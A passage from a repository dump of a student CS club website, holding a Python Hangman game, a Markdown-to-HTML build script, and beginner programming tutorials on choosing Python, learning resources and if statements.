letter!\")\n return prompt_user() # We prompt the user again\n elif letter < 'a' or letter > 'z':\n print(\"Your guess must be an English letter!\")\n return prompt_user()\n return letter\n\ndef check_guess(letter):\n if letter in correct_letters or letter in incorrect_letters:\n # There's a better way of doing this, which\n # I'll introduce another time, but for now, None is not\n # a bad way to indicate that the letter's been guessed before.\n return None\n if letter in secret:\n correct_letters.append(letter)\n return True # Correct guess\n incorrect_letters.append(letter)\n return False # Incorrect guess\n\ndef unique_letters(word):\n unique = []\n for i in word:\n if not (i in unique):\n unique.append(i)\n return unique\n\ndef win_condition():\n if len(incorrect_letters) == len(HANGMANPICS) - 1:\n return False # User has lost\n if len(correct_letters) == len(unique_letters(secret)):\n return True # User has won\n return None # User has neither won or lost. Game is still going.\n\n\ndef win_screen():\n print(HANGMANPICS[len(incorrect_letters)])\n print(\"You won! The secret word was: \" + secret)\n\ndef lose_screen():\n print(HANGMANPICS[-1])\n print(\"You lost! The secret word was: \" + secret)\n\ndef print_incorrect_guesses():\n if incorrect_letters != []:\n print(\"Incorrect guesses: \" + \", \".join(incorrect_letters))\n\ndef print_secret_word():\n print(\"Word: \", end=\"\")\n for i in secret:\n if i in correct_letters:\n print(i, end=\" \")\n else:\n print(\"_\", end=\" \")\n print()\n\ndef start_game():\n if win_condition() != None:\n if win_condition():\n win_screen()\n return\n else:\n lose_screen()\n return\n print(HANGMANPICS[len(incorrect_letters)])\n print_incorrect_guesses()\n print_secret_word()\n guess = prompt_user()\n clear()\n is_correct = check_guess(guess)\n if is_correct == None:\n print(\"You've already made the guess \" + guess + \"!\")\n elif not is_correct:\n print(guess + \" was incorrect!\")\n else:\n print(guess + \" was a good guess!\")\n start_game()\n\nclear()\nstart_game()\n"
},
{
"alpha_fraction": 0.650620698928833,
"alphanum_fraction": 0.6529009342193604,
"avg_line_length": 30.576000213623047,
"blob_id": "b51fdc796a4bf1c9bdf5fd6d7e26bb365ea64915",
"content_id": "a04e15cbf81567054193c018b421baf8059dd9cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3949,
"license_type": "no_license",
"max_line_length": 210,
"num_lines": 125,
"path": "/build.py",
"repo_name": "cyfaircs/cyfaircs.github.io",
"src_encoding": "UTF-8",
"text": "import os\nfrom os.path import join, exists\nfrom xml.etree import ElementTree as ET\nimport json\n\nimport markdown\nfrom markdown.treeprocessors import Treeprocessor\nfrom markdown.postprocessors import Postprocessor\nfrom markdown.extensions import Extension, fenced_code\n\nbase_url = \"http://cyfaircs.github.io/\"\n\ndata_js = []\n\nclass UnderlineProcessor(Treeprocessor):\n\tdef run(self, root):\n\t\tfor anchor in root.iter(\"a\"):\n\t\t\tanchor.attrib[\"class\"] = anchor.attrib.get(\"class\", \"\") + \" underline\"\n\nclass BoilerplateProcessor(Postprocessor):\n\tdef __init__(self, root, file):\n\t\tself.root = root\n\t\tself.file = file\n\t\twith open(join(self.root, \"meta.json\"), \"r\") as f:\n\t\t\tself.meta = json.loads(f.read())\n\n\tdef in_data_js(self):\n\t\tfor article in data_js:\n\t\t\tif article[\"Link\"] == self.root:\n\t\t\t\treturn True\n\t\treturn False\t\t\n\n\tdef add_to_data_js(self):\n\t\tif not self.in_data_js():\n\t\t\tnew = {\n\t\t\t\"Name\": self.meta[\"cover\"][\"name\"],\n\t\t\t\"Description\": self.meta[\"cover\"][\"description\"],\n\t\t\t\"Link\": self.root,\n\t\t\t\"Date\": self.meta[\"cover\"][\"date\"],\n\t\t\t}\n\t\t\tdata_js.append(new)\n\n\tdef run(self, text):\n\t\tself.add_to_data_js()\n\t\treturn self.generate_html(text)\n\n\tdef generate_table_of_contents(self):\n\t\tif self.meta.get(\"series\") == None:\n\t\t\treturn \"\"\n\t\thtml = \"<ul id='tableOfContents'>\"\n\t\tfor v, k in self.meta[\"series\"].items():\n\t\t\tif k == self.file:\n\t\t\t\thtml += \"<li><a class='selected'>\" + v + \"</a></li>\"\n\t\t\telse:\n\t\t\t\thtml += f\"<li><a href='{k}' class='underline'>\" + v + \"</a></li>\"\t\t\t\t\n\t\thtml += \"</ul>\"\n\t\treturn html\n\n\tdef get_file_title(self):\n\t\tif self.meta.get(\"series\") == None:\n\t\t\treturn self.meta[\"cover\"][\"name\"]\n\t\tfor title, file in self.meta[\"series\"].items():\n\t\t\tif self.file == file:\n\t\t\t\treturn title\n\n\tdef generate_html(self, text):\n\t\treturn f\"\"\"<!DOCTYPE html>\n<html>\n{self.generate_head()}\n<body>\n<header>\n<a class=\"underline\" href=\"../../index.html\">←</a>\n</header>\n{self.generate_table_of_contents()}\n<article>\n{text}\n</article>\n</body>\n</html>\"\"\"\n\n\tdef generate_head(self):\n\t\treturn f\"\"\"<head><meta charset='utf-8'>\n<meta http-equiv='X-UA-Compatible' content='IE=edge'>\n<title>LSC CS</title>\n<meta name='viewport' content='width=device-width, initial-scale=1'>\n<meta content=\"{self.get_file_title()}\" property=\"og:title\">\n<meta content=\"{self.meta[\"cover\"][\"description\"]}\" property=\"og:description\">\n<meta content=\"{base_url + f\"{self.root}/{self.file}\"}\" property=\"og:url\">\n<meta content=\"{base_url + f\"{self.root}/cover.png\"}\" property=\"og:image\">\n<meta content=\"#32CCFF\" property=\"theme-color\">\n<link href=\"https://fonts.googleapis.com/css?family=Open+Sans\" rel=\"stylesheet\">\n<link rel=\"stylesheet\" type=\"text/css\" href=\"../../base.css\">\n<link rel=\"stylesheet\" media=\"screen\" type=\"text/css\" href=\"../monokai.css\">\n<link rel=\"stylesheet\" media=\"print\" type=\"text/css\" href=\"../friendly.css\">\n<link rel='stylesheet' type='text/css' href='../article.css'>\n</head>\"\"\"\n\nclass MyExtensions(Extension):\n\tdef __init__(self, root, file):\n\t\tself.root = root\n\t\tself.file = file\n\n\tdef extendMarkdown(self, md):\n\t\tmd.postprocessors.register(BoilerplateProcessor(self.root, self.file), \"bp\", 1)\n\t\tmd.treeprocessors.register(UnderlineProcessor(), \"underline\", 1)\n\ndef build():\t\n\tfor root, _, files in os.walk(\"articles/\"):\n\t\tfor file in files:\n\t\t\tif file.endswith(\".md\"):\n\t\t\t\tfile_path = join(root, file)\n\t\t\t\twith open(file_path, \"r\", encoding=\"utf-8\") as md_file:\n\t\t\t\t\thtml_file_name = file.replace(\".md\", \".html\")\n\t\t\t\t\twith open(join(root, html_file_name), \"w+\", encoding=\"utf-8\") as html_file:\n\t\t\t\t\t\textension_configs = {\n\t\t\t\t\t\t\t\"codehilite\": {\n\t\t\t\t\t\t\t\t\"guess_lang\": False,\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t}\n\t\t\t\t\t\thtml_file.write(markdown.markdown(md_file.read(), extensions=[MyExtensions(root, html_file_name), \"toc\", \"codehilite\", \"tables\", \"md_in_html\"], extension_configs=extension_configs, output_format=\"html5\"))\n\twith open(\"data.js\", \"w+\") as f:\n\t\tf.write(f\"let Articles = {json.dumps(data_js)}\")\nif __name__ == \"__main__\":\n\tbuild()\n\tprint(\"Site built\")\n"
},
{
"alpha_fraction": 0.7489639520645142,
"alphanum_fraction": 0.7531081438064575,
"avg_line_length": 146.48147583007812,
"blob_id": "ff7f123d4d2076359d920da15f5c08292c541fee",
"content_id": "3316b68aaec4c27d59c56e77b1e3d3cc7b2c4e67",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 7965,
"license_type": "no_license",
"max_line_length": 724,
"num_lines": 54,
"path": "/articles/intro/index.html",
"repo_name": "cyfaircs/cyfaircs.github.io",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE html>\n<html>\n<head><meta charset='utf-8'>\n<meta http-equiv='X-UA-Compatible' content='IE=edge'>\n<title>LSC CS</title>\n<meta name='viewport' content='width=device-width, initial-scale=1'>\n<meta content=\"Why Python?\" property=\"og:title\">\n<meta content=\"An introductory project to showcase Python\" property=\"og:description\">\n<meta content=\"http://cyfaircs.github.io/articles/intro/index.html\" property=\"og:url\">\n<meta content=\"http://cyfaircs.github.io/articles/intro/cover.png\" property=\"og:image\">\n<meta content=\"#32CCFF\" property=\"theme-color\">\n<link href=\"https://fonts.googleapis.com/css?family=Open+Sans\" rel=\"stylesheet\">\n<link rel=\"stylesheet\" type=\"text/css\" href=\"../../base.css\">\n<link rel=\"stylesheet\" media=\"screen\" type=\"text/css\" href=\"../monokai.css\">\n<link rel=\"stylesheet\" media=\"print\" type=\"text/css\" href=\"../friendly.css\">\n<link rel='stylesheet' type='text/css' href='../article.css'>\n</head>\n<body>\n<header>\n<a class=\"underline\" href=\"../../index.html\">←</a>\n</header>\n<ul id='tableOfContents'><li><a class='selected'>Why Python?</a></li><li><a href='index1.html' class='underline'>Intro to Python</a></li><li><a href='index2.html' class='underline'>What If</a></li><li><a href='index3.html' class='underline'>Data Types</a></li><li><a href='index4.html' class='underline'>Loops and Functions</a></li><li><a href='index5.html' class='underline'>Hangman</a></li></ul>\n<article>\n<p><img alt=\"\" src=\"cover.png\"></p>\n<figcaption>Author: Amr Ojjeh</figcaption>\n<figcaption>Cover By: Amr Ojjeh</figcaption>\n<figcaption>Last updated: July 5, 2021</figcaption>\n\n<h1 id=\"why-python\">Why Python?</h1>\n<p>Before starting the main event, I'd like to write a sort of preface, that answers the basic questions which will surround this series. Why did I choose Python? Why are we making Hangman? And what's the plan after this series?</p>\n<h2 id=\"the-goal\">The Goal</h2>\n<p>As will be restated in the next article, the goal of thise series is to get members to write their first game, completely on their own pace, and without any prior programming experience. So, now the question is, why am I choosing this approach, and what even is that approach?</p>\n<h2 id=\"why-python_1\">Why Python?</h2>\n<p>If you're a little bit familiar with programming, you may roughly understand that there are several different programming languages we, as programmers, can choose from. Without going into too much detail, what makes each programming language unique is the circumstances in which they're made for. C++, the language taught to students at CyFair for CS Majors, is primarily used for developing native projects, that is, projects which are run directly by the operating system. It also gives programmers the ability to manage memory directly, instead of being handled by the language itself.</p>\n<p>C++ is not the only language that allows for these two features, so that's not all which makes it unique. There's also the standard library, the build tools, the syntax and semantics, and so on and so forth. If you don't understand what all that means, do not worry, this course is not about C++!</p>\n<p>Instead, it'll be going over Python. The reasoning for this, is that Python is more beginner friendly. This does not make it a toy, however. Python is extensively used in real world projects in all sorts of various fields, especially data science, and to an extent, game development. It's even what's used to make <a class=\" underline\" href=\"https://github.com/lonestarcyfair/lonestarcyfair.github.io/blob/main/build.py\">this site</a> stylish!</p>\n<p>Python is also much easier to run compared to C++. Recall, that C++ produces programs which are run by the operating system. That means that programs produced by C++ are OS-dependent. If your friend has a mac, and you've made your program on Windows, you will not be able to share your program with them, unless they build the project on their system. Python, on the other hand, installs what's called an interpreter, and that is the program that <em>runs</em> your code. Thus, all your python programs depend on the interpreter rather than operating system, and as long as your neighbor has the interpreter installed, regardless of what OS they're running, they should be able to run your program without any hassle.</p>\n<p>Keep in mind that all languages have their pros and cons. Python is more fit as an introductory language, and is faster to develop on compared to C++, which is why we'll be using it. C++ offers other benefits, such as performance, and the fact that it is OS-dependent, means there is no requirement to install an interpreter to run C++ programs.</p>\n<h2 id=\"why-hangman\">Why Hangman?</h2>\n<p>Game development takes a tremendous amount of time, and as games scale, so does development time. I, however, don't want you to keep waiting, and I'd rather make it possible to make your first game within a week.</p>\n<p>The game itself, Hangman, is not sophisticted to program. It, in fact, would likely take an experienced programmer less than an hour to program. That is why it's the perfect project.</p>\n<p>It is our goal that you understand every part of the game, and as such, I'll be introducing each concept in the next series of articles, and you'll see every single one applied to make the game. I hope that with this project knocked out, you'll feel ready to make your next game completely on your own, whether it be Hangman: The Electric Boogaloo, a text adventure, or even an RPG game.</p>\n<h2 id=\"whats-coming-afterwards\">What's Coming Afterwards?</h2>\n<p>Developing your own game! But ok, you want to make the next big leap, how do you do that?</p>\n<p>The plan is that after this series is written, I'll work on another series introducing PyGame, a python module which allows you to make your own \"actual\" game, i.e. one that has a window which you can interact with using a mouse.</p>\n<p>However, since I am the sole author of all these articles, and considering the amount of time each one takes to write, it's questionable when I'll be able to finish the next series. It's possible that I could knock it out this summer, but it might have to wait until Spring break as I'm starting a new internship. Regardless, I hope this series alone will be enough to put you on the map so to speak, so that even in the event where the next series won't come out, you'll be able to continue to grow your knowledge through other means.</p>\n<h2 id=\"how-do-i-grow-my-knowledge-through-other-means\">How Do I Grow My Knowledge Through Other Means?</h2>\n<p>There's a rule of thumb that every programmer should go by. To my knowledge, all mainstream programming language have the goal of being easy to learn. As in, the authors of each language will write as much as they can to encourage new programmers to learn their language. They do this through the means of documentation, and Python is no exception. Right here, <a class=\" underline\" href=\"https://docs.python.org/3/\">https://docs.python.org/3/</a>, contains everything you need to know about Python, and not only that, but it contains 100x more.</p>\n<p>You want to learn PyGame too? Fear not, just like how authors of languages want to make it easy for you to learn said languages, authors of libraries have a similar goal! <a class=\" underline\" href=\"https://www.pygame.org/docs/\">https://www.pygame.org/docs/</a>, within this site, you'll find all the documentation and tutorials that you'll need.</p>\n<p>Still want more? <a class=\" underline\" href=\"https://www.google.com\">Google</a>, <a class=\" underline\" href=\"https://stackoverflow.com/\">Stackoverflow</a>, and so many other sites and forums can suppliment your learning experience. All you have to be is willing to read and willing to try. I wish you luck on your journey, and with that, I hope you enjoy the next few articles!</p>\n<p>When you're ready, you can read start reading the <a class=\" underline\" href=\"index1.html\">next</a> article.</p>\n</article>\n</body>\n</html>"
},
{
"alpha_fraction": 0.7756049036979675,
"alphanum_fraction": 0.7774279117584229,
"avg_line_length": 133.08888244628906,
"blob_id": "b23a40100d164f6d3579f82599ed0a764b42b95a",
"content_id": "02ac1a4e56d67e3be7b3b0f37a3763ffd1a20b3c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6034,
"license_type": "no_license",
"max_line_length": 710,
"num_lines": 45,
"path": "/articles/intro/index.md",
"repo_name": "cyfaircs/cyfaircs.github.io",
"src_encoding": "UTF-8",
"text": "\n<figcaption>Author: Amr Ojjeh</figcaption>\n<figcaption>Cover By: Amr Ojjeh</figcaption>\n<figcaption>Last updated: July 5, 2021</figcaption>\n\n# Why Python?\n\nBefore starting the main event, I'd like to write a sort of preface, that answers the basic questions which will surround this series. Why did I choose Python? Why are we making Hangman? And what's the plan after this series?\n\n## The Goal\nAs will be restated in the next article, the goal of thise series is to get members to write their first game, completely on their own pace, and without any prior programming experience. So, now the question is, why am I choosing this approach, and what even is that approach?\n\n## Why Python?\nIf you're a little bit familiar with programming, you may roughly understand that there are several different programming languages we, as programmers, can choose from. Without going into too much detail, what makes each programming language unique is the circumstances in which they're made for. C++, the language taught to students at CyFair for CS Majors, is primarily used for developing native projects, that is, projects which are run directly by the operating system. It also gives programmers the ability to manage memory directly, instead of being handled by the language itself.\n\nC++ is not the only language that allows for these two features, so that's not all which makes it unique. There's also the standard library, the build tools, the syntax and semantics, and so on and so forth. If you don't understand what all that means, do not worry, this course is not about C++!\n\nInstead, it'll be going over Python. The reasoning for this, is that Python is more beginner friendly. This does not make it a toy, however. Python is extensively used in real world projects in all sorts of various fields, especially data science, and to an extent, game development. It's even what's used to make [this site](https://github.com/lonestarcyfair/lonestarcyfair.github.io/blob/main/build.py) stylish!\n\nPython is also much easier to run compared to C++. Recall, that C++ produces programs which are run by the operating system. That means that programs produced by C++ are OS-dependent. If your friend has a mac, and you've made your program on Windows, you will not be able to share your program with them, unless they build the project on their system. Python, on the other hand, installs what's called an interpreter, and that is the program that *runs* your code. Thus, all your python programs depend on the interpreter rather than operating system, and as long as your neighbor has the interpreter installed, regardless of what OS they're running, they should be able to run your program without any hassle.\n\nKeep in mind that all languages have their pros and cons. Python is more fit as an introductory language, and is faster to develop on compared to C++, which is why we'll be using it. C++ offers other benefits, such as performance, and the fact that it is OS-dependent, means there is no requirement to install an interpreter to run C++ programs.\n\n## Why Hangman?\nGame development takes a tremendous amount of time, and as games scale, so does development time. I, however, don't want you to keep waiting, and I'd rather make it possible to make your first game within a week.\n\nThe game itself, Hangman, is not sophisticted to program. It, in fact, would likely take an experienced programmer less than an hour to program. That is why it's the perfect project.\n\nIt is our goal that you understand every part of the game, and as such, I'll be introducing each concept in the next series of articles, and you'll see every single one applied to make the game. I hope that with this project knocked out, you'll feel ready to make your next game completely on your own, whether it be Hangman: The Electric Boogaloo, a text adventure, or even an RPG game.\n\n## What's Coming Afterwards?\nDeveloping your own game! But ok, you want to make the next big leap, how do you do that?\n\nThe plan is that after this series is written, I'll work on another series introducing PyGame, a python module which allows you to make your own \"actual\" game, i.e. one that has a window which you can interact with using a mouse.\n\nHowever, since I am the sole author of all these articles, and considering the amount of time each one takes to write, it's questionable when I'll be able to finish the next series. It's possible that I could knock it out this summer, but it might have to wait until Spring break as I'm starting a new internship. Regardless, I hope this series alone will be enough to put you on the map so to speak, so that even in the event where the next series won't come out, you'll be able to continue to grow your knowledge through other means.\n\n## How Do I Grow My Knowledge Through Other Means?\nThere's a rule of thumb that every programmer should go by. To my knowledge, all mainstream programming language have the goal of being easy to learn. As in, the authors of each language will write as much as they can to encourage new programmers to learn their language. They do this through the means of documentation, and Python is no exception. Right here, [https://docs.python.org/3/](https://docs.python.org/3/), contains everything you need to know about Python, and not only that, but it contains 100x more.\n\nYou want to learn PyGame too? Fear not, just like how authors of languages want to make it easy for you to learn said languages, authors of libraries have a similar goal! [https://www.pygame.org/docs/](https://www.pygame.org/docs/), within this site, you'll find all the documentation and tutorials that you'll need.\n\nStill want more? [Google](https://www.google.com), [Stackoverflow](https://stackoverflow.com/), and so many other sites and forums can suppliment your learning experience. All you have to be is willing to read and willing to try. I wish you luck on your journey, and with that, I hope you enjoy the next few articles!\n\nWhen you're ready, you can read start reading the [next](index1.html) article.\n"
},
{
"alpha_fraction": 0.7684982419013977,
"alphanum_fraction": 0.7723073959350586,
"avg_line_length": 98.05660247802734,
"blob_id": "bbd6e25c69673752762823f6c724f0fe28b48f6c",
"content_id": "00161c97479d4bb51bf2a4110497c3ca7597ad04",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 10501,
"license_type": "no_license",
"max_line_length": 680,
"num_lines": 106,
"path": "/articles/week2/index.md",
"repo_name": "cyfaircs/cyfaircs.github.io",
"src_encoding": "UTF-8",
"text": "\n# How should I start?\n\nHello folks! Firstly, I want to announce, that in the last week alone, we've had 29 new students enroll in our club! I want to thank the student life for making this possible, and the CyFair students for their willingness to try something new. Prior to that week, including the officers and I, we had 39 students in the server, at least 16 of whom were active at one point or another. I asked for an active community, and that is what I'm getting. I'm grateful for it, and I'll be making sure I do my part until the last day of the semester.\n\nAs I've promised, this club will be welcoming to people, regardless of their skill level, As such, this article will be for anyone who has no experience with programming but wants to get started.\n\nSpecifically, I'll be addressing these questions:\n\n* What's a programming language? (TL;DR a specific way to tell the computer what to do)\n\n* Which language should I program in? (TL;DR Python, but read more if you're curious about other options)\n\n* Which videos/books/sites should I follow? (TL;DR Depends on the language)\n\n* How do I practice programming? (TL;DR Games, coding challenges, standard applications, etc.. Read more for specific ideas.)\n\n## What's a Programming Language?\n\nIn the computer world, there are two parts. There is hardware, and there is software. You can literally throw your hardware out the window, because all hardware has mass. It's your case, monitor, graphics card, CPU, anything that you can touch. That said, please don't try throwing anything out your window.\n\nOn the other hand, software is (mostly) everything else, that is your operating system, this website, all the programs you've installed, and so on. Electrical engineers specialize with hardware, computer scientists specialize in software, and computer engineers specialize in their overlap. Very often, electrical engineers don't work alone when developing hardware, but work with computer sciensts and computer engineers as well.\n\nNow, you likely already have a computer, and the computer has all the hardware it needs. How do you tell it what to do? That is, in essence what the job of a programming *language* is; to communicate with a computer. I won't talk in depth about how that occurs, especially since that varies with each language. Instead, I'll provide you with examples and enough simple details so that you know which language is best for you. If you choose to stick with it, you will eventually learn how the language itself works.\n\n## Which Language Should I Program In?\n\nAs mentioned in the TL;DR above, if in doubt, go with Python. It's by far the easiest to understand and program in. Plus, even it doesn't end up being the most fitting for you, a lot of programming knowledge can be transferred when transitioning to another language. And if you program for long enough, you'll likely learn every single language listed below in time. With that said, more on how to learn Python in the next section.\n\nHowever, if you want to consider starting in other languages, here's your guide for that. If you want to:\n\n* take CS classes at CyFair: C++, then Java\n\n* learn the interworkings of a computer: C (not to be confused with C++)\n\n* write games: more on that next paragraph\n\n* learn cybersecurity: Python *and* C\n\n* write websites: Javascript (with HTML and CSS)\n\n* share *code* easily: Python\n\n* share *programs* easily: C++\n\n* share *both* easily: Javascript\n\nOk, let's talk about game development. Most games are written using a game engine. You might've heard of Unity, Unreal Engine, CryEngine, Frostbite, and so on. Their logos will usually appear at the start of a game. Using a game engine, is the most practical and sane way of writing a game, as without one, a lot more months, if not years of work, would need to go into developing the most generic of game, and I am not exaggerating. So, if you plan to use a game engine, I advise you to do your research, pick your engine, then learn the langauge the engine is using *before* you use the engine. As a brief rundown:\n\n* Unity uses C#\n\n* Unreal uses C++\n\n* Godot uses GDScript, which is very similar to Python (it can also use C# and C++, but because they're less used in Godot, learning Godot with C# or C++ can be more challenging)\n\nPersonally, I found Godot to be the most user friendly, but regardless, if this is the route you wish to pursue, learn the language of the engine you plan to go with, and learn it before you use the engine. It will make your life much easier in the long run.\n\nIf you do not plan to use a game engine, you really only need a language which can run fast. Python won't do the trick, but languages like C++ and C# are battleground tested for this sort of thing. Celeste, for example, was made using C# without a game engine (they used Monogame, which is a library). Do note, however, that if you're going to make a game without an engine, that usually means you'll have to write a lot of your own tools and libraries, effectively making your own game engine. That is why C++ and C# make effective languages for this option, because they are in fact used to write game engines themselves.\n\n## Which videos/books/sites should I follow?\n\nBefore I share any resources, a word of caution regarding videos. They can be very easy to binge. That can be good, but often what will end up happen is, you'll finish a whole playlist and think you've learned a ton, but by the time you work on your first project, you'll realize how little in fact you've retained. This is simply due to a lack of practice, which we'll talk more about in the next section.\n\nAnother note, you'll find that some people use different programs than others. That's fine, the tools each person uses is completely irrelevant to your understanding of the langauge. Keep that in mind as you learn, and if you have a question regarding a tool someone uses, feel free to message me. For now, here are the resources I'll be recommending (feel free to mix and match, but **focus on one language!**)\n\nFor Python:\n\n* [Derek Banas](https://www.youtube.com/watch?v=nwjAHQERL08) teaches Python by covering material then testing you on it right after. It's one way to mitigate the binging problem stated earlier, which is why I recommend him.\n\n* [Corey Schafer](https://www.youtube.com/playlist?list=PL-osiE80TeTskrapNbzXhwoFUiLCjGgY7) also does a great job teaching, although I don't recall him having practice problems. Regardless, his explanations are really good, so I have him listed here.\n\n* If you prefer books to videos, while I've not read it myself, I've heard great things about [Automate the Boring Stuff With Python](https://automatetheboringstuff.com/). The book is completely free online, and also provides the option of a physical copy, which you can buy from their [site](https://nostarch.com/automatestuff2) or [Amazon](https://www.amazon.com/Automate-Boring-Stuff-Python-2nd/dp/1593279922) (if you buy from their site, you get the PDF as well).\n\n* And of course, the official website of [Python](https://wiki.python.org/moin/BeginnersGuide), which links to other resources, and even lets you learn Python completely on the web without installing anything.\n\nFor C++:\n\n* [Cherno](https://www.youtube.com/watch?v=18c3MTX0PK0&list=PLlrATfBNZ98dudnM48yfGUldqGD0S4FFb&index=1), who used to work at EA as a game engine programmer, is an excellent teacher and programmer. Many times he'll go under the hood and show what the computer is actually doing. He also has a series where he develops a game engine from the bottom up.\n\n* [Javidx9](https://www.youtube.com/watch?v=E7CxMHsYzSs) takes another approach, which is by writing and explaining many small C++ projects, allowing for a great opportunity for someone to practice implementing the projects which he implements, or to take them further and improve upon them. He uses his own library to allow for very easy rendering on the console.\n\n* If you want a book, unfortunately, I don't know which one to recommend. Personally, I read [Tour of C++](https://www.amazon.com/Bjarne-Stroustrupand-Depth-Addison-Wesley-Professional/dp/B07VKBLS4Y/), written by the author of the language, but it's definitely not for beginners, even though it's a great book.\n\nI'll be adding resources here for Java or C# or a game engine if they're requested enough. I'm getting exhausted!\n\n## How Do I Practice Programming?\n\nYou have the videos, the books, the articles, now how do you practice? Well, if any of these things have practice built into them, then that's awesome. If not, here's what I recommend:\n\n* if you would like to solve small CS or computational problems: [Project Euler](https://projecteuler.net/archives) or [HackerRank](https://www.hackerrank.com/) make good websites. \n\n* If you wish to see common problems solved in a language of your choosing: [Rosetta Code](https://www.rosettacode.org/wiki/Rosetta_Code).\n\n* If you would like to work on a slightly bigger project: Write a small game such as tic tac toe, snake, soduku logical checker, hangman, text adventure, etc...\n\n* Follow along these articles! I'll be writing about interesting algorithms, and I recommend you try to implement them.\n\n* Going with the spirit of the book mentioned earlier, automate the boring stuff. Try fun things, like downloading cat images until its told to stop, or make discord bots which kicks anyone with the name \"Amr,\" or write a tournament tracking system. Anything you can think of, even if you don't _need_ it, write it for the sake of practice.\n\n* Finally, if you're feeling confident, tackle on a big project. Make an RPG, or your personal website, anything that you can put your all-in into.\n\nAs a final word of advice, do not go into any project or challenge expecting that you have to solve them or finish them. The point of practice is that you learn what you're capable of, and how you can learn more. I've listed all these resources as a start for y'all, but I personally had to go through many trials and errors to find these resources, as I've learned how to ask questions and where to find their answers. Regardless of how many more resources I list here, you will have to go through the same phase of learning I went through, as you'll encuonter your own unique problems, and technology is inevitably going to change and the materials here will become out of date.\n\nWith that said, I hope I've provided plenty! You get in what you put out, so it's going to take a time investment. Good luck on your adventures!\n\n---\n\n"
},
{
"alpha_fraction": 0.7150806784629822,
"alphanum_fraction": 0.7217584848403931,
"avg_line_length": 48.91666793823242,
"blob_id": "74118e87bc2767da20bcee2ef68bcd5bf347ad57",
"content_id": "4ddfe1c20ed207772c3247562459446d743daedb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3594,
"license_type": "no_license",
"max_line_length": 436,
"num_lines": 72,
"path": "/articles/intro/index2.md",
"repo_name": "cyfaircs/cyfaircs.github.io",
"src_encoding": "UTF-8",
"text": "\n<figcaption>Author: Amr Ojjeh</figcaption>\n<figcaption>Cover By: Amr Ojjeh</figcaption>\n<figcaption>Last updated: June 6, 2021</figcaption>\n\n# What If\n\nIf you've not read the previous article, I encourage you to go [back](index1.html) and read it.\n\nSo far, the programs we've written have been very straightforward. Regardless of the input, the same code was to be executed. However, most of the programs we'd like to write are not this simple.\n\n## If Statement\n\nSay we're developing a website, and we want to check the user's age to validate whether or not they are above 13 years old. Of course, this system is commonly cheated, but nonetheless, it makes a simple example of the if statement. Here's how we'd do that:\n\n\t:::python\n\tage = int(input(\"How old are you? \"))\n\tif age >= 13:\n\t\tprint(\"Welcome!\")\n\tif age < 13:\n\t\tprint(\"You're not allowed to sign up! But feel free to come back when you're older :)\")\n\nI won't go too much into the formal syntax, since this should be easy to understand on its own. If the given age is greater than *or equal to* 13, `>=`, we print \"Welcome!\". Note the indendation, this is telling Python that this line only runs if the if statement is true. The colon, `:`, tells python to *expect* an indentation, and since if statements must have code nested within, they must also have a colon at the end of the line.\n\nAfter it executes that, it runs the next if statement. You might've realized by now that if the first if statement is false, then the second is guaranteed to be true (if it's not greater than or equal to 13, then it can only be smaller). Similarly, if the second statement is true, then the first one must've been false. In cases like this, you can simplify the code and write:\n\n\t:::python\n\tif age >= 13:\n\t\tprint(\"Welcome!\")\n\telse:\n\t\tprint(\"You're not allowed to sign up! But feel free to come back when you're older :)\")\n\nYou can go further, and chain if statements using \"else if\" statements, called `elif` in Python.\n\n\t::python\n\tif age > 13:\n\t\tprint(\"Welcome!\")\n\telif age == 13:\n\t\tprint(\"You came back for us!\")\n\telse:\n\t\tprint(\"You're not allowed to sign up! But feel free to come back when you're older :)\")\n\n\n<figcaption>Here's the logic of the program in a flow chart form</figcaption>\n\nFor the `elif` and `else` branch to even be considered, the `if` branch **must** be false. And for the `else` branch to run, both the `if` and the `elif` **must** be false.\n\nYou can continue the chain and add as many `elif` statements as you please.\n\n\t::python\n\tif name == \"Amr\":\n\t\tprint(\"Welcome President!\")\n\t\tprint(\"Because you're special, can I have your lucky number?\")\n\t\tinput(\"Pretty please? \")\n\t\tprint(\"Thanks! I'll be sure to use it\") # He doesn't use it\n\telif name == \"Talida\":\n\t\tprint(\"Welcome Vice President!\")\n\telif name == \"Hagar\":\n\t\tprint(\"Welcome Secretary!\")\n\telif name == \"Catherine\":\n\t\tprint(\"Welcome Social Media Officer!\")\n\telse:\n\t\tprint(\"Welcome \" + name + \"!\")\n\tprint(\"How are you doing?\")\n<figcaption>The \"#\" character means that anything after is a comment. Comments are ignored by Python.</figcaption>\n\nI assume there are some questions going through your head. What's `int` and what does it do? Why do we use `==` to compare things? If the if statement still seems like magic, then don't worry, all these questions will be covered next article, when we go over data types. For now, I recommend you simply focus on the patterns.\n\n## Exercise\nWrite a program which prints your letter grade given the class score.\n\nWhen you're ready, you can read start reading the [next](index3.html) article.\n"
},
{
"alpha_fraction": 0.7035490870475769,
"alphanum_fraction": 0.7320806980133057,
"avg_line_length": 67.42857360839844,
"blob_id": "8f701563193da2a8f36a9b26efb37a954fc64d62",
"content_id": "1ccd334f20d6c1c5a8b750454632a644cb9bd2fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 7185,
"license_type": "no_license",
"max_line_length": 757,
"num_lines": 105,
"path": "/articles/binary/index.md",
"repo_name": "cyfaircs/cyfaircs.github.io",
"src_encoding": "UTF-8",
